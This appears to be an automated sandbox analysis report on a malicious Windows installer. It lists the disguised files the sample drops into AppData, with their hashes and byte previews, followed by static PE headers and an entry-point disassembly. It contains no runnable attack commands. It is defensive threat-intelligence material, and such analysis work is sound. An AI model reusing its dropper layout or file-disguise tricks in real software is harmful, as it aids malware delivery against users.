File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 76x197, components 3
Category:	dropped
Size (bytes):	6028
Entropy (8bit):	7.934780456271549
Encrypted:	false
SSDEEP:	96:RhXE4WTXQUVsLLl9vaxwrBnNk/3REfi132Co5p7lrEik1MEirZ8Jcics9:LXXQXQ7uxIm/3REK132D5phEiQirK5X9
MD5:	F9D9FF81C5A1981E6D8D05FF64C375A3
SHA1:	A880B1EE40AF72076B8BC02BF62E89489A5481ED
SHA-256:	FA20D23F9216A071D4A75F1ED13515C02704746D091EF2B9D5C09896E5143534
SHA-512:	6D1CEA465CF4BC488C94AD875E9DE0EC4B73061CF94A2D6F200C7DA8DA472A83C2ADF6413383BAC18843BF9ED1FA5B0D633C326E82AEFCE532C8BF2512F83124
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........L.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...U.Ar..~.<.[...~..U..n....G...(..........6Q.K..........v....7\...$o@.t..y...^..>..C.~...^"..A$.p. ...... ..sK.5....N..\..........[]..J...yC...5G./.../E.1GD.6.rA.6...\.X...<.U.ir.hS.MI..#d.nR~.+...o..B.K.d..2@ ..>.....Mk...\Co..Xu..k.<.G...8...M.}C.....R..G<w..+)8U.3\.g+7.z._.....).1..I..;pO?..'...G1.'......1..i...w....I..A....^i.?...N....'9...B..nQ.P

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Kokkerering\Krukkes.for

Download File

Process:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
File Type:	data
Category:	dropped
Size (bytes):	216186
Entropy (8bit):	1.2440696313854045
Encrypted:	false
SSDEEP:	3072:JWmCwIPw5AcywvTvHnxuoEWljFo26U82/LdKhBMqn3xh0:7BIM8I
MD5:	A294462A1566CE13B91DCE3515CBBE99
SHA1:	2EE7CA771D5EE98F23DFD60AEF636063FB9FB39E
SHA-256:	159A445C0FE5840209F47C0846AAC408D7A52CB16BF69E8ED9EF461CF9618063
SHA-512:	E08266B0CAF0E0089EFCA6FF49924E65073B89F26B60F84642F744E4C24BD8F0F61F892BC5DA8C36A276CA40090DF427DCA581B43AEDB841F2188983F2CBDE21
Malicious:	false
Preview:	........................9...........w............~.................................[...............Z........................../......C..........................................).......................................#..........................................................b.......................................................0..............................................L...................................2........................8..............%......w........................F.............................................................................................................G.................................................................E.........................v.............................................q......................V........l...........................................................................................................`...............i..l.....".......,..............F...................................U...........m......................X.....

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Kokkerering\Levnedsmiddelet.hyd

Download File

Process:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
File Type:	data
Category:	dropped
Size (bytes):	52515
Entropy (8bit):	1.2339950087992486
Encrypted:	false
SSDEEP:	384:TZuT1tvvcUHAApb0CSLYXN2ESvROeZ+tAKgXBmf6rF0OxFpsDcfTcG+nOMT60EI/:ItMfIDSvRBZ+tbgXBDF0Ovx+fT64oNy
MD5:	7FB552F9EDF2578492ECB1AC6ED812D4
SHA1:	D976EC08EE4E7F05B8A370B904332F56471D27DE
SHA-256:	6356F2D4505DB44E6E8159A1D677250F09B796DDDB00182951E16D04E7A53F63
SHA-512:	342ECEFD649D96C9A06DC283DB808A4320A2803DCD461FE509E5D564ABB612EF4B65A9450511189B29E49D5A4087A3F27A9D5C15EEEC2D2EB55C49D486F48F54
Malicious:	false
Preview:	.........................................................................................................................a........'.B................................................................................`...................S.........................................................................................3....................................P...............................q..........................9..........R...'...................p...................................................................................................................>..............4..............................l..".......................................................o....................T....................;...........+..................................v.....6................................b../......g.......x..............................S.........g7#................b.....................................................?................................................................

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Kokkerering\Meir.ini

Download File

Process:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 76x197, components 3
Category:	dropped
Size (bytes):	6406
Entropy (8bit):	7.91324021094192
Encrypted:	false
SSDEEP:	192:LXXQXQ7uxIm/3REK132D5phEiQirK5Xvctcs:7XzuOmvyfhEE25XvJs
MD5:	69FDCA2AECDDEC1F02F8849BB7524031
SHA1:	897688E80B403AAC39036851ABDF8D07F948CFED
SHA-256:	7AFD32B592315D4D5DACC9205EDB18F058CC312B95C690AEC795AE1C5CDBCFD9
SHA-512:	0AEE6236EC213A1F829F64A94F277C334467CCA974664104129BD3B52E8FDCC049741B73E5B5E9453A1B8D7E5A828C5DB8A5BBECB4A3FF5470B42C082469172B
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........L.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...U.Ar..~.<.[...~..U..n....G...(..........6Q.K..........v....7\...$o@.t..y...^..>..C.~...^"..A$.p. ...... ..sK.5....N..\..........[]..J...yC...5G./.../E.1GD.6.rA.6...\.X...<.U.ir.hS.MI..#d.nR~.+...o..B.K.d..2@ ..>.....Mk...\Co..Xu..k.<.G...8...M.}C.....R..G<w..+)8U.3\.g+7.z._.....).1..I..;pO?..'...G1.'......1..i...w....I..A....^i.?...N....'9...B..nQ.P

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Kokkerering\Supratonsillar.ini

Download File

Process:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 384x185, components 3
Category:	dropped
Size (bytes):	14049
Entropy (8bit):	7.91807748657587
Encrypted:	false
SSDEEP:	384:wqmHIc+9W7tPMa2+d7ubE2CwYyjyzzlpyCEysbOJbV2C:wqmocnd/aSwz2XX/sbEJD
MD5:	8AB3CA28CE62FC46C07B5B98FBBB414B
SHA1:	240E8583EFDC5A9C6D75BF7B11F262914BD04200
SHA-256:	C5A65D61DD4F44DEEDC787B8A3D6C4B09B38DC25EB93AD8FEDDA047C00C6CEA4
SHA-512:	295B01BD4821D508415FAC01E09EFA81B3CF4C73749CBD9BB58B578B26476E19CA2A08E67A11A60843CECFCE05FB5066B3DD277CC5CA0107D4283E8E992928ED
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..F.UG95a."..XD.0....QR.)..aqO.[....y.4...F.Bf46RJ..........?D....O...P+eJ.s.[A.0c...j.I(....Q....t.}...q.+.G.I.....U. .#.R+...8...?.5..Jw.....>....h..z]....}*...x.B.qLjB..j..SJ..4.Pi.f...A.].......#.p.OY..U.5....jG....i..+...C.....'Y.K.Wg.kM....+......b^!..\|.Kk.9FMlZ.m.....s..H.C+.e.k.......1..RH.m.EmN.R/..rWz~.%IV.1\..sy.`..].4`0.W..H.!....i%..g5<..1.j

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Kokkerering\asaraceae.txt

Download File

Process:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 384x185, components 3
Category:	dropped
Size (bytes):	13561
Entropy (8bit):	7.944486430660756
Encrypted:	false
SSDEEP:	384:wqmHIc+9W7tPMa2+d7ubE2CwYyjyzzlpyCEysbOJbVD:wqmocnd/aSwz2XX/sbEJD
MD5:	B01D2EE27691E0946A05D90BFF5738FF
SHA1:	7202B8A8FA2CB0BE12C35E1DB38B73D7EF5BE2B3
SHA-256:	99A8FF2023B2897A6521E088258EBD61EF560283D294E395A6CE4671EE0E3FA6
SHA-512:	1916D6C935EEF69CAEA32989023F337AD1D68DFFD6A2E6018DFC010E3BFA3B70A0EBCA797446C46C35BC273C91D2005A117EA35704AED9FC4BBBB75A85F6506B
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..F.UG95a."..XD.0....QR.)..aqO.[....y.4...F.Bf46RJ..........?D....O...P+eJ.s.[A.0c...j.I(....Q....t.}...q.+.G.I.....U. .#.R+...8...?.5..Jw.....>....h..z]....}*...x.B.qLjB..j..SJ..4.Pi.f...A.].......#.p.OY..U.5....jG....i..+...C.....'Y.K.Wg.kM....+......b^!..\|.Kk.9FMlZ.m.....s..H.C+.e.k.......1..RH.m.EmN.R/..rWz~.%IV.1\..sy.`..].4`0.W..H.!....i%..g5<..1.j

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Kokkerering\friezer.txt

Download File

Process:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 76x197, components 3
Category:	dropped
Size (bytes):	7274
Entropy (8bit):	7.778553745678111
Encrypted:	false
SSDEEP:	192:LXXQXQ7uxIm/3REK132D5phEiQirK5Xvctc0an:7XzuOmvyfhEE25XvJ08
MD5:	D3B67F439E3520AD4222C98CA488BFA2
SHA1:	9CE0BBE7AEA677CD022980D1237690B66BF9C380
SHA-256:	43FB0CAAFF47E62E124A73C22E07E89D6D94BC93FF2A6DDA57A2C28A1225DFFD
SHA-512:	1EC28E17F10D8A2E6412281122F84AAB26210E8A6C99A60CD34F88E2222780419B285E4CCEEE16B7CB5F1B41BC8B343B39A0D280D5A861336B731F2A240E8AEE
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........L.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...U.Ar..~.<.[...~..U..n....G...(..........6Q.K..........v....7\...$o@.t..y...^..>..C.~...^"..A$.p. ...... ..sK.5....N..\..........[]..J...yC...5G./.../E.1GD.6.rA.6...\.X...<.U.ir.hS.MI..#d.nR~.+...o..B.K.d..2@ ..>.....Mk...\Co..Xu..k.<.G...8...M.}C.....R..G<w..+)8U.3\.g+7.z._.....).1..I..;pO?..'...G1.'......1..i...w....I..A....^i.?...N....'9...B..nQ.P

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Kokkerering\kderegel.txt

Download File

Process:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 531x550, components 3
Category:	dropped
Size (bytes):	27142
Entropy (8bit):	7.937950694247041
Encrypted:	false
SSDEEP:	384:HPIGC4eyQ7QeqSad6dm8wme7yjVd/oZRLcz3jP2kjc7JKAWdylE8RcCfAhZwJ8a:HPw42hasAN7yjHQc3pA0LMDRcwJF
MD5:	541F2C5A945E473E104CB993414ACF54
SHA1:	E87A90C84328C40E059CD05F136235C1A9DDD9AE
SHA-256:	D3EFA687CCDF945CE7AE1C524BA2883057A0D00C6BF317DB5519164344188494
SHA-512:	FD5B135D735C334755763CCEE29861B68D10437938947A4E140576A3420DC73EE163FDB21A2082635848DC33F8A4614AB2BC0C1F6E9FF1EAE5FBA7E2BCA96468
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......&...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....y..M.'8.+9lf...QI.MH.j.O.k:..c...4.n...1..k..J.H.X.'...T.......:...z..^.=."..".G..[^...c..TmR...V.L..T....q.U94.$I.T&.....[...)S..0....{......T...Z.F..;U9IiW5.)..-..5`...0?.y..l63.....hA.\m.%.aI..J..(O......P...*..f.Y&je...N.....t....PR.E0..@...=izQE0....q..)..y.S@..PX...Al6..~.?..N..O>..,........$>..$u..,..)....".r..r-H.5(....U es.i.)...4.iM%Q"R.v

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Kokkerering\lorded.txt

Download File

Process:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 531x550, components 3
Category:	dropped
Size (bytes):	26575
Entropy (8bit):	7.946417329290275
Encrypted:	false
SSDEEP:	384:HPIGC4eyQ7QeqSad6dm8wme7yjVd/oZRLcz3jP2kjc7JKAWdylE8RcCfAhZQ:HPw42hasAN7yjHQc3pA0LMDRcQ
MD5:	B3C9708BAAA65457A17170269A21EF71
SHA1:	F2EAE9E9F236AF8A61A17BC765FBA90A8CE393F7
SHA-256:	0652B5053D759D94FE40A67BC2FF470A250533B75570F0D0D86A759681573B3E
SHA-512:	A7B5A431FDA7F30E601806D248302ACCF73D54C73723B900E0F9152D7D8F2A15A362A55C4059DA1BF7E6C5224E6CC04EAE201BD9FC25D95B3023C9D9E49233E9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......&...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....y..M.'8.+9lf...QI.MH.j.O.k:..c...4.n...1..k..J.H.X.'...T.......:...z..^.=."..".G..[^...c..TmR...V.L..T....q.U94.$I.T&.....[...)S..0....{......T...Z.F..;U9IiW5.)..-..5`...0?.y..l63.....hA.\m.%.aI..J..(O......P...*..f.Y&je...N.....t....PR.E0..@...=izQE0....q..)..y.S@..PX...Al6..~.?..N..O>..,........$>..$u..,..)....".r..r-H.5(....U es.i.)...4.iM%Q"R.v

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Nino\cqWZtEH4eJ.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	800373
Entropy (8bit):	7.603514559306423
Encrypted:	false
SSDEEP:	12288:2tlyuHaQfKnzzedL06bXRplBNYKfniVtsKB2Nc3pipkyfGSz:AbQO0CBplBNCtsnc5yfFz
MD5:	218330299346A6935455DFAB57EC8AC3
SHA1:	DF2EFA883B7225FDA2C790CF535CF87A05AB5880
SHA-256:	1EFACE4A669563E22A5AA35131E3C3B3DA273361C13BDF989FB5B2049FBCAE4B
SHA-512:	7948D3A14487B17C1C0D309C99AC22D21153778D38B72C8B1E239A292086CD5674512B06F0543DF2B288960539C67377058B6A359B8A3ADF30AE5E3223F6BBDF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 58% Antivirus: Virustotal, Detection: 70%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..L@../O...@...c...@..+F...@..Rich.@..........PE..L......`.................d....9.....%3............@...........................=...........@.................................8........0;.h............................................................................................................text...0b.......d.................. ..`.rdata..t............h..............@..@.data...x.9..........\|..............@....ndata.......@:..........................rsrc...h....0;.....................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Nino\cqWZtEH4eJ.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Nino\snusdaases.jpg

Download File

Process:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 531x550, components 3
Category:	dropped
Size (bytes):	26001
Entropy (8bit):	7.948061981828881
Encrypted:	false
SSDEEP:	384:HPIGC4eyQ7QeqSad6dm8wme7yjVd/oZRLcz3jP2kjc7JKAWdylE8RcCfAhO:HPw42hasAN7yjHQc3pA0LMDRp
MD5:	47F9CE8203A2AF484EBF0EFB9AAC90AA
SHA1:	D696706CF587DA3AEAA852C0623EC0037CE429E8
SHA-256:	BE707A416458B30652EC5A6C36FCA438E8E3DE4341742646ECB4FDD4ED8A9947
SHA-512:	A7DC9F3D57C8D5A99F6D9827C8692A0A85FD3528BEB3D4DAC3861DF611123901FAF49A3853DE48681D72DA558262E10360A78CC4668AB638E66DB6141B05DE58
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......&...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....y..M.'8.+9lf...QI.MH.j.O.k:..c...4.n...1..k..J.H.X.'...T.......:...z..^.=."..".G..[^...c..TmR...V.L..T....q.U94.$I.T&.....[...)S..0....{......T...Z.F..;U9IiW5.)..-..5`...0?.y..l63.....hA.\m.%.aI..J..(O......P...*..f.Y&je...N.....t....PR.E0..@...=izQE0....q..)..y.S@..PX...Al6..~.?..N..O>..,........$>..$u..,..)....".r..r-H.5(....U es.i.)...4.iM%Q"R.v

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Nino\tavse.gam

Download File

Process:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
File Type:	data
Category:	dropped
Size (bytes):	369267
Entropy (8bit):	1.2505498508943538
Encrypted:	false
SSDEEP:	3072:q4GegDIdTXvDmD7bAesUYZXiOcxlvD2srap7dG7kw/d+yIX2CoVN/18d1/MWmYB1:BIW+zx6PXU+
MD5:	C6FFD2E64ED2416142F50EA4046578B8
SHA1:	875FF4760B702CAA1D2AA7E1482D0468BB95850C
SHA-256:	90C089F5BBAA260A087BF1B8C5F56C14F0D3E4A369872AB1E429DB71A969B80F
SHA-512:	685D035FDBEFD3BCD3B703F6D7D5BB4FA7D242B62326052B279634DDCB7C3AD1100DF7C2730B5CCF647D0B4E43C26AB4FA97711013327204E162D7D3CEA4A6D2
Malicious:	false
Preview:	j................................................................................@......B.....k.g...........................................................y..................................i......N..................N........5................................................................................................................b........X.............B.............................].X................................................................................................................n....................VF...Z.........................................Z..........................{..................S..................................8.....E....................................................................................../.W...................:.........................................V...\|e...........r.............................................................N..........................O........................................................k.......................

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Nino\ungauntlet.txt

Download File

Process:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 76x197, components 3
Category:	dropped
Size (bytes):	7742
Entropy (8bit):	7.685816559459474
Encrypted:	false
SSDEEP:	192:LXXQXQ7uxIm/3REK132D5phEiQirK5Xvctc0awWk/:7XzuOmvyfhEE25XvJ0//
MD5:	CAB6C7C8AB58D902E1836D53A688CD4A
SHA1:	55C46FA98306F5E0F35B89796891CA126E52F02A
SHA-256:	82B4B8B3994B4A9D277F249AC6D2B034715DA0F5BAE309604D3BF1CA7247B4E9
SHA-512:	9115FF2B00F98109B989DDEB316D5D6F1A1509DCFA56FE8ABB75F0753DE7BE0C8CD16C978F36CA46DFF5BA0A55E67A432077A14EBAFC1446260E7B249A938A3E
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........L.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...U.Ar..~.<.[...~..U..n....G...(..........6Q.K..........v....7\...$o@.t..y...^..>..C.~...^"..A$.p. ...... ..sK.5....N..\..........[]..J...yC...5G./.../E.1GD.6.rA.6...\.X...<.U.ir.hS.MI..#d.nR~.+...o..B.K.d..2@ ..>.....Mk...\Co..Xu..k.<.G...8...M.}C.....R..G<w..+)8U.3\.g+7.z._.....).1..I..;pO?..'...G1.'......1..i...w....I..A....^i.?...N....'9...B..nQ.P

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Nino\vejningers.jpg

Download File

Process:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 384x185, components 3
Category:	dropped
Size (bytes):	12929
Entropy (8bit):	7.957757236123418
Encrypted:	false
SSDEEP:	384:wqmHIc+9W7tPMa2+d7ubE2CwYyjyzzlpyCEysbG:wqmocnd/aSwz2XX/sbG
MD5:	D80B9F37C8A58A34326507D15B2141F3
SHA1:	92A352F9BCF3E9231FB96F2EBCE0EEB3B28D53C3
SHA-256:	83BB4E7FFE9511AE104E48B1F9E350308AFAA12F12F8750170A7C6A956EA7238
SHA-512:	DD6CD1188BB082A1D336D0DCBEAD91B26B1EE045CD852B9CBF61DFEF11D7EC940199034C389FB30838B82EBB672622D3994409409C8A68834D3F276469E9C370
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..F.UG95a."..XD.0....QR.)..aqO.[....y.4...F.Bf46RJ..........?D....O...P+eJ.s.[A.0c...j.I(....Q....t.}...q.+.G.I.....U. .#.R+...8...?.5..Jw.....>....h..z]....}*...x.B.qLjB..j..SJ..4.Pi.f...A.].......#.p.OY..U.5....jG....i..+...C.....'Y.K.Wg.kM....+......b^!..\|.Kk.9FMlZ.m.....s..H.C+.e.k.......1..RH.m.EmN.R/..rWz~.%IV.1\..sy.`..].4`0.W..H.!....i%..g5<..1.j

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Nino\vitrifacture.txt

Download File

Process:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 76x197, components 3
Category:	dropped
Size (bytes):	6748
Entropy (8bit):	7.868770137002905
Encrypted:	false
SSDEEP:	192:LXXQXQ7uxIm/3REK132D5phEiQirK5Xvctc0J:7XzuOmvyfhEE25XvJ0J
MD5:	9361066F2EAB82730A5F698F735ECF25
SHA1:	7279F63469EFC0AAF9FCF70D8ACCD623F7D5AC6B
SHA-256:	4976EE2C2C27F507B578F55C6323533DEE7B47E25877F8F51398AD34545497D0
SHA-512:	F706FB6DBD5596631AE35A2F6B8FD0D723BD46E6F646383245C470F57C2B3CEE2A82F4695E24D9E0A2F7382156EAAD4AE218443069C962B247015EC8429583EE
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........L.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...U.Ar..~.<.[...~..U..n....G...(..........6Q.K..........v....7\...$o@.t..y...^..>..C.~...^"..A$.p. ...... ..sK.5....N..\..........[]..J...yC...5G./.../E.1GD.6.rA.6...\.X...<.U.ir.hS.MI..#d.nR~.+...o..B.K.d..2@ ..>.....Mk...\Co..Xu..k.<.G...8...M.}C.....R..G<w..+)8U.3\.g+7.z._.....).1..I..;pO?..'...G1.'......1..i...w....I..A....^i.?...N....'9...B..nQ.P

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.603514559306423
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	cqWZtEH4eJ.exe
File size:	800'373 bytes
MD5:	218330299346a6935455dfab57ec8ac3
SHA1:	df2efa883b7225fda2c790cf535cf87a05ab5880
SHA256:	1eface4a669563e22a5aa35131e3c3b3da273361c13bdf989fb5b2049fbcae4b
SHA512:	7948d3a14487b17c1c0d309c99ac22d21153778d38b72c8b1e239a292086cd5674512b06f0543df2b288960539c67377058b6a359b8a3adf30ae5e3223f6bbdf
SSDEEP:	12288:2tlyuHaQfKnzzedL06bXRplBNYKfniVtsKB2Nc3pipkyfGSz:AbQO0CBplBNCtsnc5yfFz
TLSH:	2405F165BB2ADD03E38100B0C5B3E3B9676D4E641A3F866287D1BE5BF97CBE10D19112
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..L@../O...@...c...@..+F...@..Rich.@..........PE..L......`.................d....9.....%3............@

File Icon


Icon Hash:	49c5e9ec6d5d8413

Static PE Info

General

Entrypoint:	0x403325
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x60FC909C [Sat Jul 24 22:13:48 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ced282d9b261d1462772017fe2f6972b

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080B8h]
call dword ptr [004080BCh]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [007A2F6Ch], eax
je 00007F7049359513h
push ebx
call 00007F704935C676h
cmp eax, ebx
je 00007F7049359509h
push 00000C00h
call eax
mov esi, 004082A0h
push esi
call 00007F704935C5F2h
push esi
call dword ptr [004080CCh]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F70493594EDh
push 0000000Bh
call 00007F704935C64Ah
push 00000009h
call 00007F704935C643h
push 00000007h
mov dword ptr [007A2F64h], eax
call 00007F704935C637h
cmp eax, ebx
je 00007F7049359511h
push 0000001Eh
call eax
test eax, eax
je 00007F7049359509h
or byte ptr [007A2F6Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408288h]
mov dword ptr [007A3038h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0079E528h
call dword ptr [0040816Ch]
push 0040A188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8438	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3b3000	0x2a768	.rsrc
